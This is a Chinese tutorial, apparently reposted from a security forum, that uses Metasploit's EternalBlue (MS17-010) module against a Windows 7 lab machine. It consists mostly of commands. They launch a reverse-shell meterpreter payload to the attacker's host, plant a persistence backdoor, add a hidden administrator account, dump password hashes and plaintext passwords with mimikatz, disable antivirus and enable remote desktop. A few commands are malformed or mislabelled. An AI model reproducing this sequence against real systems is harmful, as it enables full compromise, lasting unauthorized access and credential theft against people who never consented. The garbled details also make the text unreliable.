通过Metasploit利用MS17_010渗透新姿势

实验环境:
靶机 Windows7  IP地址 192.168.1.109

攻击机:Kali Linux 2019 IP地址 192.168.1.110

实验步骤:

apt-get install wine 更新wine

wine cmd.exe 测试递归,然后输入exit推出即可

nmap -O -sV 192.168.1.109  扫描端口

service postgresql start 启动postgresql

msfconsole   

search ms17_010 搜索ms17_010模块

use exploit/windows/smb/ms17_010_eternalblue 调用ms17_010模块

set RHOST 192.168.1.109 设置被攻击的主机

set payload windows/x64/meterpreter/reverse_tcp 选择payload

set LHOST 192.168.1.110 设置本机地址,注意这里的地址是你kali的地址

set LPORT 445 (和被攻击的端口相同,否则攻击失败)

run 开始攻

好了现在我们已经成功地入侵并且拿到了靶机的shell了,现在我们开始进行入侵后的深入利用了。我们现在拿到的只是这台靶机的临时使用权,那我们如果想下次再利用怎么办呢,那就需要我们在这台靶机里面安放后门方便下次使用,操作如下:

run persistence -U -A -i 10 - 8090 -r 192.168.1.110 (kali的ip) 生成后门方便下下次使用

如果我们要是用这台机器我们需要创建一个独立的用户来供我们自己使用并且顺便提升一下这个用户的权限

run getgui -u kali -p 123456 创建本地用户

提权

shell

net localgroup administrators  kaliceshi /add

其实我们还可以获取靶机上原本就存在的账户的用户名和密码

getuid 提权

load mimikatz 加载模块

msv 获取密码哈希值

kerberos 获取明文密码

特殊情况使用

mimikatz_command -f samdump::hashes

mimikatz_command -f sekurlsa::searchPasswords

再或者查看靶机信息,运行时间,关闭杀毒软件和开启远程桌面服务等

sysinfo 查看系统信息

idletime  查看靶机运行时间

run post/windows/gather/checkvm 查看靶机运行的如理位置

run post/windows/manage/killav 关闭杀毒软件,由于我的靶机没有安装杀毒软件所以检测不到

run post/windows/manage/enable_rdp  开启远程桌面服务

文章转自:林三岁网络安全实验室

转载请注明出处:https://bbs.linsansui.cn/forum.php?mod=viewthread&tid=13&extra=page%3D1

上一篇:Metasploit reload命令使用技巧


下一篇:Metasploit命令info使用技巧